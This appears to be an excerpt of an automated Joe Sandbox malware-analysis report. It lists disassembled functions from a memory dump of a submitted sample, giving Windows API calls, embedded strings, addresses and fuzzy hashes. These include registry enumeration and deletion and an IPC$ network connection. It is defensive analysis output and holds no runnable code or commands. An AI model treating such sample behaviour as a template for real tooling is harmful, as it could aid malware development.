DeleteDC.GDI32(?), ref: 002726E8
ReleaseDC.USER32(00000000,?), ref: 002726F3

Strings

(, xrefs: 0027268D

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: a6a319a68575f65652bb226f58d3613ae9314cb7f4224428571bc3e70a0c58e7
Instruction ID: f1d97d1aba7f883c8c4868901177fdb20e0823ffd26f4d75529b417e090967f0
Opcode Fuzzy Hash: a6a319a68575f65652bb226f58d3613ae9314cb7f4224428571bc3e70a0c58e7
Instruction Fuzzy Hash: D6610475D10219EFCF14CFA4D988AAEBBB9FF48310F20852AE959A7250D770A951CF60

Function 0022DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0022DAA1

Part of subcall function 0022D63C: _free.LIBCMT ref: 0022D659
Part of subcall function 0022D63C: _free.LIBCMT ref: 0022D66B
Part of subcall function 0022D63C: _free.LIBCMT ref: 0022D67D
Part of subcall function 0022D63C: _free.LIBCMT ref: 0022D68F
Part of subcall function 0022D63C: _free.LIBCMT ref: 0022D6A1
Part of subcall function 0022D63C: _free.LIBCMT ref: 0022D6B3
Part of subcall function 0022D63C: _free.LIBCMT ref: 0022D6C5
Part of subcall function 0022D63C: _free.LIBCMT ref: 0022D6D7
Part of subcall function 0022D63C: _free.LIBCMT ref: 0022D6E9
Part of subcall function 0022D63C: _free.LIBCMT ref: 0022D6FB
Part of subcall function 0022D63C: _free.LIBCMT ref: 0022D70D
Part of subcall function 0022D63C: _free.LIBCMT ref: 0022D71F
Part of subcall function 0022D63C: _free.LIBCMT ref: 0022D731

_free.LIBCMT ref: 0022DA96

Part of subcall function 002229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0022D7D1,00000000,00000000,00000000,00000000,?,0022D7F8,00000000,00000007,00000000,?,0022DBF5,00000000), ref: 002229DE
Part of subcall function 002229C8: GetLastError.KERNEL32(00000000,?,0022D7D1,00000000,00000000,00000000,00000000,?,0022D7F8,00000000,00000007,00000000,?,0022DBF5,00000000,00000000), ref: 002229F0

_free.LIBCMT ref: 0022DAB8
_free.LIBCMT ref: 0022DACD
_free.LIBCMT ref: 0022DAD8
_free.LIBCMT ref: 0022DAFA
_free.LIBCMT ref: 0022DB0D
_free.LIBCMT ref: 0022DB1B
_free.LIBCMT ref: 0022DB26
_free.LIBCMT ref: 0022DB5E
_free.LIBCMT ref: 0022DB65
_free.LIBCMT ref: 0022DB82
_free.LIBCMT ref: 0022DB9A

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 72bb62ead8bd29393347ec819144500d77ca3ed580f52e199ec16be2b7426802
Instruction ID: 312e170de2a855e59f7ef906fc2ed01a17a744a53cc63902211157f275ba42e5
Opcode Fuzzy Hash: 72bb62ead8bd29393347ec819144500d77ca3ed580f52e199ec16be2b7426802
Instruction Fuzzy Hash: 96315A31664226FFEB21AFB8F845B5AB7E9FF04310F615819F449D7191DE31ACA48B20

Function 0025365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0025369C
_wcslen.LIBCMT ref: 002536A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00253797
GetClassNameW.USER32(?,?,00000400), ref: 0025380C
GetDlgCtrlID.USER32(?), ref: 0025385D
GetWindowRect.USER32(?,?), ref: 00253882
GetParent.USER32(?), ref: 002538A0
ScreenToClient.USER32(00000000), ref: 002538A7
GetClassNameW.USER32(?,?,00000100), ref: 00253921
GetWindowTextW.USER32(?,?,00000400), ref: 0025395D

Strings

%s%u, xrefs: 00253734

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 8f8e69734f3316dba380bd7959315b86c4e705455a840865d17879ed8cf4c8df
Instruction ID: bad4a385aaafea1b75b47b3840ac5bfe7cd0662aa209ea93a35f70bade99390f
Opcode Fuzzy Hash: 8f8e69734f3316dba380bd7959315b86c4e705455a840865d17879ed8cf4c8df
Instruction Fuzzy Hash: 4891D1B1214607AFD719DF24C884BEAF7A8FF44391F005529FD99C2190DB30EA69CBA5

Function 00254954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00254994
GetWindowTextW.USER32(?,?,00000400), ref: 002549DA
_wcslen.LIBCMT ref: 002549EB
CharUpperBuffW.USER32(?,00000000), ref: 002549F7
_wcsstr.LIBVCRUNTIME ref: 00254A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00254A64
GetWindowTextW.USER32(?,?,00000400), ref: 00254A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00254AE6
GetClassNameW.USER32(?,?,00000400), ref: 00254B20
GetWindowRect.USER32(?,?), ref: 00254B8B

Strings

ThumbnailClass, xrefs: 00254A6F, 00254AF1

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: f290c91b2c96e410744f8d723a203c7729f7034db596350f3ba96baf03f76508
Instruction ID: a234b3599ea9fe0e1ba8beb18871bd67f6a0fdd2ffd1f9f2292c2b2b91f38d79
Opcode Fuzzy Hash: f290c91b2c96e410744f8d723a203c7729f7034db596350f3ba96baf03f76508
Instruction Fuzzy Hash: 3191F7314242069FDB04EF14C885FBAB7E8FF84319F044469FD859A095EB30EDA9CBA5

Function 00288D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00209BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00209BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00288D5A
GetFocus.USER32 ref: 00288D6A
GetDlgCtrlID.USER32(00000000), ref: 00288D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00288E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00288ECF
GetMenuItemCount.USER32(?), ref: 00288EEC
GetMenuItemID.USER32(?,00000000), ref: 00288EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00288F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00288F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00288FA1

Strings

0, xrefs: 00288E9F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 07d6fa0497687cfc9022f8aa8df908a50ada361310d3376877555f6e42b4b1ad
Instruction ID: ce48d4cd00d93f4cff791dc5ab43aaaee2ea62939883abf5816e5208d78ecfa9
Opcode Fuzzy Hash: 07d6fa0497687cfc9022f8aa8df908a50ada361310d3376877555f6e42b4b1ad
Instruction Fuzzy Hash: AD81C2795163029FDB10EF24D884A6B77E9FF98314F500519FA84972D1DB70D920CB62

Function 0025DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0025DC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0025DC46
_wcslen.LIBCMT ref: 0025DC50
_wcsstr.LIBVCRUNTIME ref: 0025DCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0025DCBC

Strings

DefaultLangCodepage, xrefs: 0025DD1F
%u.%u.%u.%u, xrefs: 0025DD9A
04090000, xrefs: 0025DCF2
StringFileInfo\, xrefs: 0025DC8F
\VarFileInfo\Translation, xrefs: 0025DCB4

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 2564dbb5eafc18eba85ca6101dd67d879c6180dc04dcb3c986c150e9db3694b5
Instruction ID: 683fd10afafc1ba56ef9c4280a44012b5f5fb1d2d323ff70b509042be8576b74
Opcode Fuzzy Hash: 2564dbb5eafc18eba85ca6101dd67d879c6180dc04dcb3c986c150e9db3694b5
Instruction Fuzzy Hash: C94127325612017ADB20BA64DC07EFF77ACEF56711F100065FD00A21C3EB749A648BB9

Function 0027CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0027CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0027CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0027CD48

Part of subcall function 0027CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0027CCAA
Part of subcall function 0027CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0027CCBD
Part of subcall function 0027CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0027CCCF
Part of subcall function 0027CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0027CD05
Part of subcall function 0027CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0027CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0027CCF3

Strings

RegDeleteKeyExW, xrefs: 0027CCC9
advapi32.dll, xrefs: 0027CCB8

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 3fdb8b7e45a771c185af62fa7a3ec376c6918432a283428d1c0b3badd7b7906c
Instruction ID: 382b3f8ee55d4c5e3f908ad27a22972e5a4145a618360efbebf04a36c659c042
Opcode Fuzzy Hash: 3fdb8b7e45a771c185af62fa7a3ec376c6918432a283428d1c0b3badd7b7906c
Instruction Fuzzy Hash: 96318075912129BBD7218F60EC8CEFFBB7CEF45750F204169A909E2240D7709A459BB0

Function 0025E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0025E6B4

Part of subcall function 0020E551: timeGetTime.WINMM(?,?,0025E6D4), ref: 0020E555

Sleep.KERNEL32(0000000A), ref: 0025E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0025E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0025E727
SetActiveWindow.USER32 ref: 0025E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0025E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0025E773
Sleep.KERNEL32(000000FA), ref: 0025E77E
IsWindow.USER32 ref: 0025E78A
EndDialog.USER32(00000000), ref: 0025E79B

Strings

BUTTON, xrefs: 0025E719

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 3fcf6b2f4afeb80c449e526f78359b9970e467599b767d6721872c2a0f0e9d6f
Instruction ID: 049d4ebb5f2cab03bc838c8bb40966c1033ee7887835692e9ab193a11419b743
Opcode Fuzzy Hash: 3fcf6b2f4afeb80c449e526f78359b9970e467599b767d6721872c2a0f0e9d6f
Instruction Fuzzy Hash: 12218BB4220251AFEF045F20FC8DE267B6DEB5938AF611424F855821A1DF71AD289B38

Function 0025E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 001F9CB3: _wcslen.LIBCMT ref: 001F9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0025EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0025EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0025EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0025EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0025EAA7

Strings

alias PlayMe, xrefs: 0025EA36
open , xrefs: 0025EA0C
play PlayMe wait, xrefs: 0025EA91
close PlayMe, xrefs: 0025EA6E, 0025EA9B
status PlayMe mode, xrefs: 0025EA58
play PlayMe, xrefs: 0025EAA2

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: dffda737f52fed8fb5b55f3524e0a661838ed274da40d557c89ee5e91666ebff
Instruction ID: 38610c2912e7972c89714d7198730473d94ae8f6f0b4c02c859d4c17f67e3384
Opcode Fuzzy Hash: dffda737f52fed8fb5b55f3524e0a661838ed274da40d557c89ee5e91666ebff
Instruction Fuzzy Hash: 2B11543166025D79D724E762DC4ADFF6A7CEBD2B80F4404257911A20D1EBB01A55C5B0

Function 00208BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00208F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00208BE8,?,00000000,?,?,?,?,00208BBA,00000000,?), ref: 00208FC5

DestroyWindow.USER32(?), ref: 00208C81
KillTimer.USER32(00000000,?,?,?,?,00208BBA,00000000,?), ref: 00208D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00246973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00208BBA,00000000,?), ref: 002469A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00208BBA,00000000,?), ref: 002469B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00208BBA,00000000), ref: 002469D4
DeleteObject.GDI32(00000000), ref: 002469E6

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: ea918a719f7fff2e0355a9aa9b7b00a3587d47d0573db722a889eaf1ca4a41fd
Instruction ID: 4cc83548eef755cc979cb8a92aa7a5461a4f2f053fcb9cd5a4f137b2ee7d6cb7
Opcode Fuzzy Hash: ea918a719f7fff2e0355a9aa9b7b00a3587d47d0573db722a889eaf1ca4a41fd
Instruction Fuzzy Hash: 89619E30522712DFEB299F24ED4DB2677F1FB42312F244519E082969A2CB71ACB0DF61

Function 00209838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00209944: GetWindowLongW.USER32(?,000000EB), ref: 00209952

GetSysColor.USER32(0000000F), ref: 00209862

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 51532b425e59b332130d63761433125d229485f13ea3d85b1196c6ed3361d0be
Instruction ID: cabfb0dde6dd2a9096f6f0c5ea7331ddd6ffd23f7f90ec459dd47817d46b8897
Opcode Fuzzy Hash: 51532b425e59b332130d63761433125d229485f13ea3d85b1196c6ed3361d0be
Instruction Fuzzy Hash: 6241B1751157449FDB205F38AC8CBB93B65AB06330F248615F9A38B2E3D7319CA1DB20

Function 002596E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0023F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00259717
LoadStringW.USER32(00000000,?,0023F7F8,00000001), ref: 00259720

Part of subcall function 001F9CB3: _wcslen.LIBCMT ref: 001F9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0023F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00259742
LoadStringW.USER32(00000000,?,0023F7F8,00000001), ref: 00259745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00259866

Strings

Line %d (File "%s"):, xrefs: 0025978F
^ ERROR, xrefs: 002597FB
%s (%d) : ==> %s: %s %s, xrefs: 0025984A
Error: , xrefs: 0025981D
Line %d:, xrefs: 002597A0

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 963d5c7f8ed92d63a02b44e0e6a9f54cb6aaf44911bd7007bd03c5bf011180df
Instruction ID: bfd395d2ad23fc850007f1a20ca63c23d6cacded1ca8713ff11b102b3dd57afa
Opcode Fuzzy Hash: 963d5c7f8ed92d63a02b44e0e6a9f54cb6aaf44911bd7007bd03c5bf011180df
Instruction Fuzzy Hash: D041197280021DAACB15FBA0DE86EFEB778AF65341F600065F60572092EB756F58CB61

Function 002506DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 001F6B57: _wcslen.LIBCMT ref: 001F6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002507A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002507BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002507DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00250804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0025082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00250837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0025083C

Strings

\IPC$, xrefs: 00250784
\CLSID, xrefs: 00250724
SOFTWARE\Classes\, xrefs: 0025070E

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 54381797df8921b27ed4fe3fe7807f37cb4e208332cfbc54055d562e1b76214d
Instruction ID: 91588ac9b16fa85f485a1947b0f69c4fc276ad39b8a404fa48945367dc839a30
Opcode Fuzzy Hash: 54381797df8921b27ed4fe3fe7807f37cb4e208332cfbc54055d562e1b76214d
Instruction Fuzzy Hash: F841147282062DABDF11EFA4DC85DFDB7B8BF14390B144129E911A7160EB309E18CBA0

Function 00273C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00273C5C
CoInitialize.OLE32(00000000), ref: 00273C8A
CoUninitialize.OLE32 ref: 00273C94
_wcslen.LIBCMT ref: 00273D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00273DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00273ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00273F0E
CoGetObject.OLE32(?,00000000,0028FB98,?), ref: 00273F2D
SetErrorMode.KERNEL32(00000000), ref: 00273F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00273FC4
VariantClear.OLEAUT32(?), ref: 00273FD8

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
